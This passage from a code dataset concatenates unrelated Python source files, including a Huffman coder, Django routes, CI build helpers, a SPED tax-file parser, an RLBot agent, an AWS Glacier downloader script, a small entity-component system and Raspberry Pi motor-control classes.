print(\"Done!\")\n\n\n\n\n\n","sub_path":"components/ai/TinyMaix/tools/resize_img.py","file_name":"resize_img.py","file_ext":"py","file_size_in_byte":2614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"189440372","text":"from heapq import *\nfrom collections import Counter\n\n\nclass Node(object):\n\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n def __repr__(self):\n return \"DATA: {}\".format(self.data)\n\n\n# Step 1\ndef countOccurances(text):\n return Counter(text).items()\n\n\n# Step 2\ndef createPriorityQueue(text):\n data = countOccurances(text)\n pq = []\n\n for each in data:\n heappush(\n pq, (\n (each[1], Node(each)) # (4, DATA: ('s', 4))\n )\n )\n return pq\n\n\n# Step 3 b\ndef createParent(min1, min2):\n parent = Node(\"parent\")\n parent.left = min1\n parent.right = min2\n\n data = (min1[0] + min2[0], parent)\n\n '''\n \n print \"data = \",data\n print \"data.left = \", data[1].left\n print \"data.right = \", data[1].right\n print \"\\n\"\n '''\n\n return data\n\n\n# Step 3 a\ndef createhuffmantree(pq):\n while (len(pq)) != 1:\n min1 = heappop(pq)\n min2 = heappop(pq)\n parent = createParent(min1, min2)\n heappush(pq, parent)\n return 
pq\n\n\ndef traverseTree(parent):\n    d = {}\n    decompression = {}\n\n    traverseTreeHelper(parent, [], d, decompression)\n    return [d, decompression]\n\n\ndef traverseTreeHelper(node, prefix, d, decompression):\n    if node[1].left == None and node[1].right == None:\n        # print prefix, node[1].data[0]\n        d[node[1].data[0]] = \"\".join(map(str, prefix[:]))\n\n        decompression[\"\".join(map(str, prefix[:]))] = node[1].data[0]\n    else:\n\n        choose = node[1].left\n        prefix.append(0)\n        traverseTreeHelper(choose, prefix, d, decompression)\n        prefix.pop()\n\n        choose = node[1].right\n        prefix.append(1)\n        traverseTreeHelper(choose, prefix, d, decompression)\n        prefix.pop()\n\n\ndef returnCompressedBits(compression, text):\n    compressedbits = []\n    for each in text:\n        compressedbits.append(compression[each])\n    return \"\".join(compressedbits)\n\n\ndef returnDecompressBits(decompression, compressedbits):\n    tmp = \"\"\n    data = []\n    for each in compressedbits:\n        tmp += each\n        # print tmp\n        if tmp in decompression:\n            data.append(decompression[tmp])\n            tmp = \"\"\n\n    return \"\".join(data)\n\n\ndef main():\n    text = \"mississippi\"\n    parent = createhuffmantree(createPriorityQueue(text))[0]\n\n    compression, decompression = traverseTree(parent)\n\n    compressedbits = returnCompressedBits(compression, text)\n    print(\"encoded data = \", compressedbits)\n\n    decompressedbits = returnDecompressBits(decompression, compressedbits)\n    print(\"decoded data = \", decompressedbits)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"Archive/P/Graphs/huffman.py","file_name":"huffman.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"573847145","text":"from django.conf.urls import url\nfrom django.urls import path\nfrom . 
import views\n\n\napp_name = 'vehicles'\n\n\nurlpatterns = [\n    path('', views.VehicleListView.as_view(), name='all'),\n    path('(?P<pk>\\d+)/', views.VehicleDetailView.as_view(), name='detail'),\n    path('create/', views.VehicleCreateView.as_view(), name='create'),\n    path('update/(?P<pk>\\d+)/', views.VehicleUpdateView.as_view(), name='update'),\n    path('delete/(?P<pk>\\d+)/', views.VehicleDeleteView.as_view(), name='delete'),\n    # url(r'^search/$', views.search, name='search'),\n    # url(r'^search/$', views.SearchFilterView.as_view(), name='search'),\n]\n\n\n\n\n\n","sub_path":"tms/vehicles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"543573420","text":"# -*- coding: utf8 -*-\nimport logging\nfrom os.path import join\n\nimport yaml\nfrom frigg_test_discovery import detect_test_tasks\n\nlogger = logging.getLogger(__name__)\n\n\ndef build_tasks(directory, docker):\n    return detect_test_tasks(docker.list_files(directory))\n\n\ndef load_settings_file(path, docker):\n    return yaml.load(docker.read_file(path))\n\n\ndef get_path_of_settings_file(directory, docker):\n    if docker.file_exist(join(directory, '.frigg.yml')):\n        return join(directory, '.frigg.yml')\n    elif docker.file_exist(join(directory, '.frigg.yaml')):\n        return join(directory, '.frigg.yaml')\n\n\ndef build_settings(directory, docker):\n    path = get_path_of_settings_file(directory, docker)\n\n    settings = {\n        'setup_tasks': [],\n        'tasks': [],\n        'webhooks': [],\n        'services': []\n    }\n\n    if path is not None:\n        settings.update(load_settings_file(path, docker))\n    else:\n        settings['tasks'] = build_tasks(directory, docker)\n\n    if len(settings['tasks']) == 0:\n        raise RuntimeError('No tasks found')\n\n    return settings\n\n\nclass CachedProperty(object):\n    def __init__(self, func, name=None):\n        self.func = func\n        self.__doc__ = getattr(func, '__doc__')\n        self.name = name or func.__name__\n\n    def __get__(self, instance, type=None):\n        if instance is None:\n            return self\n        res = instance.__dict__[self.name] = self.func(instance)\n        return res\n\n\ncached_property = CachedProperty\n","sub_path":"frigg_worker/build_helpers.py","file_name":"build_helpers.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"435244161","text":"#!C:\\Python27\\python.exe\r\n# -*- coding: utf-8 -*-\r\nimport os\r\nimport sys\r\nLinhasExport = []\r\nLinhasExportC197 = []\r\nindC100 = 0\r\ndef main():\r\n\tglobal LinhasExport\r\n\tDiretorio = ''\r\n\ttry:\r\n\t\tDiretorio = os.path.abspath(sys.argv[1])\r\n\texcept Exception as e:\r\n\t\tDiretorio = os.path.abspath('.')\r\n\r\n\tfor Arq in os.listdir(Diretorio):\r\n\t\tif Arq.upper().endswith(\".TXT\") and not Arq.endswith(\"LinhasArquivo.txt\"):\r\n\t\t\tProcessaArquivo(os.path.abspath(Diretorio + '/' + Arq.encode(\"cp1252\")))\r\n\r\n\twith open('LinhasArquivo.txt','w') as ArquivoExport:\r\n\t\tfor linha in LinhasExport:\r\n\t\t\tArquivoExport.write('|'.join(linha) + '\\n')\r\n\r\n\twith open('LinhasArquivoC197.txt','w') as ArquivoExport:\r\n\t\tfor linha in LinhasExportC197:\r\n\t\t\tArquivoExport.write(linha)\r\n\r\ndef ProcessaArquivo(CaminhoArquivo):\r\n\tglobal LinhasExport\r\n\tglobal indC100\r\n\tglobal LinhasExportC197\r\n\twith open(CaminhoArquivo,'r') as ArquivoSped:\r\n\t\tLinhaC100 = []\r\n\t\tLinhaC170 = []\r\n\t\tNumInsert = 0\r\n\t\tIndIncluiNota = False\r\n\t\tNomeParam = 
ArquivoSped.name.replace('\\\\','/').split('/')[-1].split(\"_\")\r\n\t\tfor Linha in ArquivoSped:\r\n\t\t\tif Linha.startswith('|C100'):\r\n\t\t\t\tLinhaC100 = Linha.split('|')\r\n\t\t\t\t#print(LinhaC100)\r\n\t\t\t\tif LinhaC100[2] == '0':\r\n\t\t\t\t\tIndIncluiNota = True\r\n\t\t\t\t\tNumInsert = 0\r\n\t\t\t\t\tindC100 += 1\r\n\t\t\t\t\tLinhaC100 = [str(indC100), NomeParam[0],NomeParam[1],NomeParam[2],NomeParam[3], LinhaC100[4], LinhaC100[5], LinhaC100[7], LinhaC100[8], LinhaC100[9], LinhaC100[10], LinhaC100[11], LinhaC100[12], LinhaC100[22], LinhaC100[24]]\r\n\r\n\t\t\t\telse:\r\n\t\t\t\t\tIndIncluiNota = False\r\n\t\t\tif Linha.startswith('|C170') and IndIncluiNota == True:\r\n\t\t\t\tSplitLinha = Linha.split('|')\r\n\t\t\t\tSplitLinha = [SplitLinha[2], SplitLinha[3], SplitLinha[4], SplitLinha[5], SplitLinha[6], SplitLinha[7], SplitLinha[10], SplitLinha[11], SplitLinha[13], SplitLinha[15], SplitLinha[18]]\r\n\r\n\t\t\t\tLinhaC170 = LinhaC100 + SplitLinha\r\n\t\t\t\tNumInsert += 1\r\n\t\t\t\tLinhasExport.append(LinhaC170)\r\n\t\t\t\t#print(LinhaC170)\r\n\t\t\tif Linha.startswith('|C190') and IndIncluiNota == True and NumInsert == 0:\r\n\t\t\t\tSplitLinha = Linha.split('|')\r\n\t\t\t\tSplitLinha =[\r\n\t\t\t\t\t'' ,\r\n\t\t\t\t\t'C190' ,\r\n\t\t\t\t\t'' ,\r\n\t\t\t\t\t'' ,\r\n\t\t\t\t\t'' ,\r\n\t\t\t\t\tSplitLinha[5 ],\r\n\t\t\t\t\tSplitLinha[2 ],\r\n\t\t\t\t\tSplitLinha[3 ],\r\n\t\t\t\t\tSplitLinha[6 ],\r\n\t\t\t\t\tSplitLinha[7 ],\r\n\t\t\t\t\tSplitLinha[9 ]\r\n\t\t\t\t]\r\n\r\n\t\t\t\tLinhaC190 = LinhaC100 + SplitLinha\r\n\t\t\t\tLinhasExport.append(LinhaC190)\r\n\r\n\t\t\tif Linha.startswith('|C197') and IndIncluiNota == True:\r\n\t\t\t\tSplitLinha = str(indC100) + Linha\r\n\r\n\t\t\t\tLinhasExportC197.append(SplitLinha)\r\n\r\nif __name__ == '__main__':\r\n\tmain()","sub_path":"statoil/ProcessaArquivos.py","file_name":"ProcessaArquivos.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"220817103","text":"# MIT License\n#\n# Copyright (c) 2018 LHolten@Github Hytak#5125@Discord\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport os\nimport sys\nfrom rlbot.agents.base_agent import SimpleControllerState, BaseAgent\nfrom rlbot.matchcomms.common_uses.set_attributes_message import handle_set_attributes_message\nfrom rlbot.matchcomms.common_uses.reply import reply_to\nfrom queue import Empty\nimport pickle\n\npath = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.insert(0, path) # this is for first process imports\n\nfrom examples.levi.output_formatter import LeviOutputFormatter\nfrom examples.levi.input_formatter import LeviInputFormatter\n\n\nclass LeviAgent(BaseAgent):\n def __init__(self, name, team, index):\n super().__init__(name, team, index)\n sys.path.insert(0, path) # this is for separate process imports\n import torch\n self.torch = torch\n self.empty_controller = SimpleControllerState()\n self.model = None\n self.model_hex = None\n self.input_formatter = None\n self.output_formatter = None\n\n def initialize_agent(self):\n self.input_formatter = self.create_input_formatter()\n self.output_formatter = self.create_output_formatter()\n\n def get_output(self, packet):\n self.handle_messages()\n\n if not packet.game_info.is_round_active:\n return self.empty_controller\n if packet.game_cars[self.index].is_demolished:\n return self.empty_controller\n if not self.model:\n return self.empty_controller\n\n arr = self.input_formatter.create_input_array([packet])\n\n with self.torch.no_grad():\n tensors = [self.torch.from_numpy(x).float() for x in arr]\n assert (tensors[0].size() == (1, 3, 9))\n assert (tensors[1].size() == (1, 5))\n out_tensors = self.model.forward(*tensors)\n new_output, _ = (x.numpy() for x in out_tensors)\n # new_output, _, _, _ = (x.numpy() for x in out_tensors)\n\n mask = self.output_formatter.get_mask(packet)\n assert (mask.shape == (1, 13))\n\n controls = self.output_formatter.format_controller_output(new_output[0] * mask[0], packet)\n\n # game_info_state = GameInfoState(game_speed=3.0)\n # game_state = GameState(game_info=game_info_state)\n # self.set_game_state(game_state)\n\n return controls\n\n def create_input_formatter(self):\n return LeviInputFormatter(self.team, self.index)\n\n def create_output_formatter(self):\n return LeviOutputFormatter(self.index)\n\n def handle_messages(self):\n for i in range(100): # process at most 100 messages per tick.\n try:\n msg = self.matchcomms.incoming_broadcast.get_nowait()\n except Empty:\n break\n\n if handle_set_attributes_message(msg, self, allowed_keys=['model_hex']):\n reply_to(self.matchcomms, msg) # Let the sender know we've set the attribute.\n self.model = pickle.loads(bytes.fromhex(self.model_hex))\n else:\n # Ignore messages that are not for us.\n self.logger.debug(f'Unhandled message: {msg}')\n","sub_path":"agents/levi_training_agent/levi_training_agent.py","file_name":"levi_training_agent.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"279185802","text":"#!/u01/Djracula/.virtualenvs/bacula-glacier/bin/python\nimport argparse\nimport glacier\nfrom celery.result import AsyncResult\nimport json\n\nDEFAULT_CHUNK_SIZE = pow(1024, 3)\nDEFAULT_OUTPUT_PATH = \".\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-v\", 
\"--vault\", help=\"The Glacier Vault name\", required=True)\nparser.add_argument(\"-j\", \"--jobid\", help=\"Job ID. Supplying a Job ID of \\\"Any\\\" will process all completed jobs with status code \\\"Succeeded\\\". Similary, supplying a Job ID of \\\"inventory\\\" or \\\"archive\\\" will process any successfully completed job that are InventoryRerieval or ArchiveRetrieval respectively.\", required=True)\nparser.add_argument(\"-o\", \"--outputpath\", help=\"Path to store output\", default=DEFAULT_OUTPUT_PATH)\nparser.add_argument(\"-c\", \"--chunksize\", help=\"Size of the chunks to use for download. Only valid of the job is ArchiveRetrieval.\", default=DEFAULT_CHUNK_SIZE)\nparser.add_argument(\"-f\", \"--friendlyname\", help=\"Use friendly name for output file\", action=\"store_true\")\nparser.add_argument(\"-r\", \"--reprocessfailed\", help=\"Reprocess a failed download (reqires a failed parts list and the source failed file)\", action=\"store_true\")\nparser.add_argument(\"-s\", \"--failedsourcefile\", help=\"Path to the download failed file\")\nparser.add_argument(\"-l\", \"--failedlistfile\", help=\"Path to the file containing the failed parts list\")\n\nargs = parser.parse_args()\n\nchunksize = int(args.chunksize)\n\nif not glacier.is_power_of_2(chunksize):\n print(\"Chunksize \" + str(chunksize) + \" is not a power of two. The next closest power of two is \" + str(glacier.next_power_of_2(chunksize)))\n\nelse:\n if args.reprocessfailed:\n if (not args.failedsourcefile) or (not args.failedlistfile):\n print(\" a failed source file and a failed list file is required to reprocess a failed download\")\n else:\n if (args.jobid.lower() == \"any\") or (args.jobid.lower() == \"inventory\" ) or (args.jobid.lower() == \"archive\"):\n print(\"reprocessing requires a specific jobid\")\n else:\n try:\n with open(args.failedlistfile, \"r\") as retry_failed_list_file:\n retry_failed_list = json.load(retry_failed_list_file)\n\n if 'all' in retry_failed_list:\n print(\"The failed list indicates that all parts failed. Please re-download the entire file instead.\")\n else:\n new_failed_list = glacier.process_failed_job(args.jobid, chunksize, args.failedsourcefile, retry_failed_list)\n if new_failed_list:\n print(\"Errors detected in re-processing the file. Overwriting old failed list file with new failed list. Please try again with this list\")\n with open(args.failedlistfile, \"w\") as retry_failed_list_file:\n json.dump(new_failed_list, retry_failed_list_file)\n else:\n print(args.failedsourcefile + \" reprocessed successfully.\")\n except:\n raise\n \n else:\n failures = glacier.process_request(args.vault, args.jobid, chunksize, args.outputpath, args.friendlyname)\n if \"all\" in failures:\n print(\"Failed at processing multiple jobs. Please try again.\")\n else:\n for job in failures:\n if failures[job]:\n print(\"Failures detected for jobid \" + job + \". 
Writing failure list to file.\")\n with open(args.outputpath + \"/\" + job + \".failed_parts.json\", \"w\") as failurefile:\n try:\n json.dump(failures[job], failurefile)\n except:\n raise\n else:\n print(job + \" downloaded successfully.\")\n","sub_path":"process_job.py","file_name":"process_job.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"99745394","text":"class System(object):\r\n '''Identifies a set of fixtures that need to be processed\r\n\r\n System has a loose coupling with Components and Entities.\r\n '''\r\n components = []\r\n Catalog = {}\r\n\r\n def __new__(cls, name=None, components=[]):\r\n '''Add systems to the catalog'''\r\n name = cls.__name__ if name is None else name\r\n if name not in System.Catalog:\r\n system = super().__new__(cls)\r\n System.Catalog[name] = system\r\n else:\r\n system = System.Catalog[name]\r\n return system\r\n\r\n def __init__(self, name=None, components=[]):\r\n self.name = name\r\n if components:\r\n self.components = components\r\n\r\n def __repr__(self):\r\n cname = self.__class__.__name__\r\n name = self.name\r\n return '<{} {}>'.format(cname, name)\r\n\r\n @property\r\n def entities(self):\r\n ents = list(set(entity for component_cls in self.component_classes\r\n for entity in component_cls.Catalog.keys()\r\n if entity is not None))\r\n return ents\r\n\r\n @property\r\n def component_classes(self):\r\n return list(set(Component.ComponentTypes.get(component_name)\r\n for component_name in self.components\r\n if component_name in Component.ComponentTypes\r\n ))\r\n\r\n def get_components(self):\r\n '''Creates a dictionary of component classes'''\r\n\r\n def update(self, dt=None):\r\n raise NotImplemented('update has not been implemented')\r\n\r\n\r\nclass CombatSystem(System):\r\n '''\r\n >>> from ag.Entity import Entity\r\n >>> from ag.Component import Component\r\n >>> from ag.fixtures import Health, Damage\r\n >>> player = Entity('player')\r\n >>> skeleton = Entity('skeleton')\r\n >>> player.health = Health()\r\n >>> player.damage = Damage()\r\n >>> skeleton.health = Health()\r\n >>> skeleton.damage = Damage()\r\n\r\n >>> combat_sim = CombatSystem()\r\n >>> player.health.current\r\n 100\r\n >>> skeleton.health.current\r\n 100\r\n >>> combat_sim.update()\r\n\r\n >>> player.health.current\r\n 90\r\n >>> skeleton.health.current\r\n 1\r\n '''\r\n components = ['Health', 'Damage']\r\n def update(self, dt=None):\r\n '''Updates the relevant data'''\r\n entityA, entityB = self.entities\r\n entityA.health.current -= entityB.damage\r\n entityB.health.current -= entityA.damage\r\n\r\nif __name__ == '__main__':\r\n from doctest import testmod\r\n\r\n testmod()\r\n\r\n","sub_path":"archive/System.py","file_name":"System.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"332921148","text":"\ndef check_data(date):\n \"\"\" Функция для проверки правильности введения даты. 
Not complete yet.\"\"\"\n    # day1, mount1, year = input('Enter the date in numeric form: ').split('.')\n    day1, mount1, year = date.split('.')\n    year = int(year)\n\n    day = {'01': 'Первое', '02': 'Второе', '03': 'Третье', '04': 'Четвертое', '05': 'Пятое', '06': 'Шестое',\n           '07': 'Седьмое', '08': 'Восьмое', '09': 'Девятое', '10': 'Десятое', '11': 'Одинадцатое', '12': 'Двенадцатое',\n           '13': 'Тринадцатое', '14': 'Четырнадцатое', '15': 'Пятнадцатое', '16': 'Шестнадцатое', '17': 'Семьнадцатое',\n           '18': \"Восемьнадцатое\", '19': 'Девятнадцатое', '20': 'Двадцатое', '21': 'Двадцать первое',\n           '22': 'Двадцать второе', '23': 'Двадцать третье', '24': 'Двадцать четвертое', '25': 'Двадцать пятое',\n           '26': 'Двадцать шестое', '27': 'Двадцать седьмое', '28': 'Двадцать восьмое', '29': 'Двадцать девятое',\n           '30': 'Тридцатое', '31': 'Тридцать первое'}\n\n    mount = {'01': 'Январь', '02': 'Февраль', '03': 'Март', '04': 'Апрель', '05': 'Май', '06': 'Июнь', '07': 'Июль',\n             '08': 'Август', '09': 'Сентябрь', '10': 'Октябрь', '11': 'Ноябрь', '12': 'Декабрь'}\n    i = 0\n    while i != 1:\n        if year % 4 != 0 and mount1 == '02':  # bug fix: compare the month string mount1, not the dict mount\n            if 0 < int(day1) <= 28:\n                i = 1\n                break # print(f'Date: {day.get(day1)} {mount.get(mount1)} {year}')\n            else:\n                print('Такого дня нет в этома месяце. В феврале 28 дней')\n        elif year % 4 == 0 and mount1 == '02':  # bug fix: same comparison error as above\n            if 0 < int(day1) <= 29:\n                i = 1\n                break # print(f'Date: {day.get(day1)} {mount.get(mount1)} {year}')\n            else:\n                print('Это високосный год. В феврале 29 дней')\n        elif mount1 == '04' or mount1 == '06' or mount1 == '09' or mount1 == '11':  # 30-day months are Apr, Jun, Sep, Nov ('07' was listed by mistake)\n            if 0 < int(day1) <= 30:\n                i = 1\n                break # print(f'Date: {day.get(day1)} {mount.get(mount1)} {year}')\n            else:\n                print('В этом месяце 30 дней')\n        elif mount1 == '01' or mount1 == '03' or mount1 == '05' or mount1 == '07' or mount1 == '08' or mount1 == '10'\\\n                or mount1 == '12':\n            if 0 < int(day1) <= 31:\n                i = 1\n                break # print(f'Date: {day.get(day1)} {mount.get(mount1)} {year}')\n            else:\n                print('В этом месяце 31 день')\n        else:\n            # print(f'Date: {day.get(day1)} {mount.get(mount1)} {year}')\n            print('Больше 31 дня в месяце не бывает, ну и в феврале больше 29 тоже')\n        day1, mount1, year = input('Теперь введите правильную дату в числовом варианте: ').split('.')\n        year = int(year)\n    else:\n        return\n\n\ndef func_pers_area():\n    dict_all = {}\n    list_info = ['Имя', 'Фамилия', 'Год рождения', 'Город проживания', 'email', 'Телефон']\n    for ind in list_info:\n        dict_time = {ind: input(f'Введите ваши данные {ind}: ')}\n        if ind == 'Год рождения':\n            check_data(dict_time.get(ind))\n        dict_all.update(dict_time)\n    return dict_all\n\n\ndict_man = func_pers_area()\ny = dict_man.values()\nprint(f'{dict_man.get(\"Имя\")} {dict_man.get(\"Фамилия\")} родился {dict_man.get(\"Год рождения\")} проживает в городе '\n      f'{dict_man.get(\"Город проживания\")}. Email: {dict_man.get(\"email\")}. Телефон: {dict_man.get(\"Телефон\")}')","sub_path":"step_3/step_3_2.py","file_name":"step_3_2.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"563554511","text":"# Program: Algoritmo253_Para0.py\n# Author: Ramon R. 
Valeriano\n# Description:\n# Developed: 03/04/202 - 09:18\n# Updated:\n\nfor e in range(10):\n    name = input(\"Enter the word: \")\n    name = name.upper()\n    cont = 0\n    for n in name:\n        if n==\"A\":\n            cont+=1\n    print(cont)\n    print()\n    \n","sub_path":"Livros/Introdução à Programação - 500 Algoritmos resolvidos/Capitulo 4/Exercicios 4a/Algoritmo253_Para0.py","file_name":"Algoritmo253_Para0.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"153693840","text":"import pigpio\nimport time\nimport threading\n\nclass Gpio:\n\n\tdef __init__(self,instance=None):\n\t\tif instance == None:\n\t\t\tself.gpio = pigpio.pi()\n\t\telse:\n\t\t\tself.gpio = instance\n\n\tdef setPinOut(self,gpionum):\n\t\tself.gpio.set_mode(gpionum,pigpio.OUTPUT)\n\n\tdef setPinIn(self,gpionum):\n\t\tself.gpio.set_mode(gpionum,pigpio.INPUT)\n\t\tself.gpio.set_pull_up_down(gpionum,pigpio.PUD_DOWN)\n\n\tdef setServo(self,gpionum,pulse_width=500):#500~2500\n\t\tself.gpio.set_servo_pulsewidth(gpionum,pulse_width)\n\n\tdef setPWM(self,gpionum,frequency=1000,range_=255,dutycycle=128):\n\t\tself.gpio.set_PWM_frequency(gpionum,frequency)\n\t\tself.gpio.set_PWM_range(gpionum,range_)\n\t\tself.gpio.set_PWM_dutycycle(gpionum,dutycycle)\n\n\tdef changeDutycycle(self,gpionum,dutycycle):\n\t\tself.gpio.set_PWM_dutycycle(gpionum,dutycycle)\n\n\tdef setInterrupt(self,gpionum,target,edge='FALLING'):\n\t\tself.setPinIn(gpionum)\n\t\tif edge == 'FALLING':\n\t\t\tself.gpio.set_pull_up_down(gpionum,pigpio.PUD_UP)\n\t\t\tvar = pigpio.FALLING_EDGE\n\t\telif edge == 'RISING':\n\t\t\tself.gpio.set_pull_up_down(gpionum,pigpio.PUD_DOWN)\n\t\t\tvar = pigpio.RISING_EDGE\n\t\telif edge == 'EITHER':\n\t\t\tself.gpio.set_pull_up_down(gpionum,pigpio.PUD_UP)\n\t\t\tvar = pigpio.EITHER_EDGE\n\t\telse:\n\t\t\traise Exception('Invalid EDGE Value')\n\t\tself.cb = self.gpio.callback(gpionum,var,target)\n\t\treturn self.cb\n\n\tdef toggleOn(self,gpionum):\n\t\tself.gpio.write(gpionum,1)\n\n\tdef toggleOff(self,gpionum):\n\t\tself.gpio.write(gpionum,0)\n\n\tdef readPin(self,gpionum):\n\t\treturn self.gpio.read(gpionum)\n\n\tdef terminate(self):\n\t\tself.gpio.stop()\n\nclass MotorControl_TB67H450FNG:\n\n\tdef __init__(self,PinR1,PinR2,PinL1,PinL2,R_speed=128,L_speed=128):\n\t\tself.gpio = Gpio()\n\t\tself.R1 = PinR1\n\t\tself.R2 = PinR2\n\t\tself.L1 = PinL1\n\t\tself.L2 = PinL2\n\t\tself.R_speed = R_speed\n\t\tself.L_speed = L_speed\n\t\tself.gpio.setPinOut(PinR1)\n\t\tself.gpio.setPinOut(PinR2)\n\t\tself.gpio.setPinOut(PinL1)\n\t\tself.gpio.setPinOut(PinL2)\n\t\tself.status = '00'\n\t\t\n\tdef spinMotor(self,mot):\n\t\tself.status = mot\n\t\tif(mot[0]=='1'):\n\t\t\tself.gpio.setPWM(self.R1,dutycycle=self.R_speed)\n\t\t\tself.gpio.toggleOff(self.R2)\n\t\telif(mot[0]=='2'):\n\t\t\tself.gpio.toggleOff(self.R1)\n\t\t\tself.gpio.setPWM(self.R2,dutycycle=self.R_speed)\n\t\telif(mot[0]=='0'):\n\t\t\tself.gpio.toggleOff(self.R1)\n\t\t\tself.gpio.toggleOff(self.R2)\n\t\t\n\t\tif(mot[1]=='1'):\n\t\t\tself.gpio.setPWM(self.L1,dutycycle=self.L_speed)\n\t\t\tself.gpio.toggleOff(self.L2)\n\t\telif(mot[1]=='2'):\n\t\t\tself.gpio.toggleOff(self.L1)\n\t\t\tself.gpio.setPWM(self.L2,dutycycle=self.L_speed)\n\t\telif(mot[1]=='0'):\n\t\t\tself.gpio.toggleOff(self.L1)\n\t\t\tself.gpio.toggleOff(self.L2)\n\n\tdef spinMotor_time(self,mot='00',duration=3):\n\t\t# bug fix: a parameter named 'time' shadowed the time module and broke time.sleep\n\t\tself.spinMotor(mot)\n\t\ttime.sleep(duration)\n\t\tself.spinMotor('00')\n\t\t\t\n\tdef stopMotor(self):\n\t\tself.spinMotor('00')\n\n\tdef 
setSpeed(self,speed_R=128,speed_L=128):\n\t\tself.R_speed = speed_R\n\t\tself.L_speed = speed_L\n\t\tself.spinMotor(self.status)\n\n\tdef turnLeft_St(self):\n\t\tprint('turn left')\n\t\tself.spinMotor('10')\n\n\tdef turnRight_St(self):\n\t\tprint('turn right')\n\t\tself.spinMotor('01')\n\t\n\tdef turnLeft(self,Time):\n\t\tprint('turn left')\n\t\tself.spinMotor('10')\n\t\ttime.sleep(Time)\n\t\tself.stopMotor()\n\t\treturn True\n\n\tdef turnRight(self,Time):\n\t\tprint('turn right')\n\t\tself.spinMotor('01')\n\t\ttime.sleep(Time)\n\t\tself.stopMotor()\n\t\treturn True\n\n\tdef moveForward(self,Time):\n\t\tself.spinMotor('11')\n\t\ttime.sleep(Time)\n\t\tself.stopMotor()\n\t\treturn True\n\n\tdef moveForward_St(self):\n\t\tself.spinMotor('11')\n\n\tdef escapeStack(self):\n\t\tself.spinMotor('02')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\t\tself.spinMotor('10')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\t\treturn True\n\t\n\tdef testMotor(self):\n\t\tself.spinMotor('12')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\t\tself.spinMotor('21')\n\t\ttime.sleep(2)\n\t\tself.stopMotor()\n\n\tdef terminate(self):\n\t\tself.gpio.terminate()\n\nclass MotorControl_TA7291P:\n\n\tdef __init__(self,PinR1,PinR2,pinR_VREF,PinL1,PinL2,pinL_VREF):\n\t\tself.gpio = Gpio()\n\t\tself.R1 = PinR1\n\t\tself.R2 = PinR2\n\t\tself.R_VREF = pinR_VREF\n\t\tself.L1 = PinL1\n\t\tself.L2 = PinL2\n\t\tself.L_VREF = pinL_VREF\n\t\tself.gpio.setPinOut(PinR1)\n\t\tself.gpio.setPinOut(PinR2)\n\t\tself.gpio.setPWM(pinR_VREF)\n\t\tself.gpio.setPinOut(PinL1)\n\t\tself.gpio.setPinOut(PinL2)\n\t\tself.gpio.setPWM(pinL_VREF)\n\t\t\n\tdef spinMotor(self,mot):\n\t\tif(mot[0]=='1'):\n\t\t\tself.gpio.toggleOn(self.R1)\n\t\t\tself.gpio.toggleOff(self.R2)\n\t\telif(mot[0]=='2'):\n\t\t\tself.gpio.toggleOff(self.R1)\n\t\t\tself.gpio.toggleOn(self.R2)\n\t\telif(mot[0]=='0'):\n\t\t\tself.gpio.toggleOff(self.R1)\n\t\t\tself.gpio.toggleOff(self.R2)\n\t\t\n\t\tif(mot[1]=='1'):\n\t\t\tself.gpio.toggleOn(self.L1)\n\t\t\tself.gpio.toggleOff(self.L2)\n\t\telif(mot[1]=='2'):\n\t\t\tself.gpio.toggleOff(self.L1)\n\t\t\tself.gpio.toggleOn(self.L2)\n\t\telif(mot[1]=='0'):\n\t\t\tself.gpio.toggleOff(self.L1)\n\t\t\tself.gpio.toggleOff(self.L2)\n\t\t\t\n\tdef 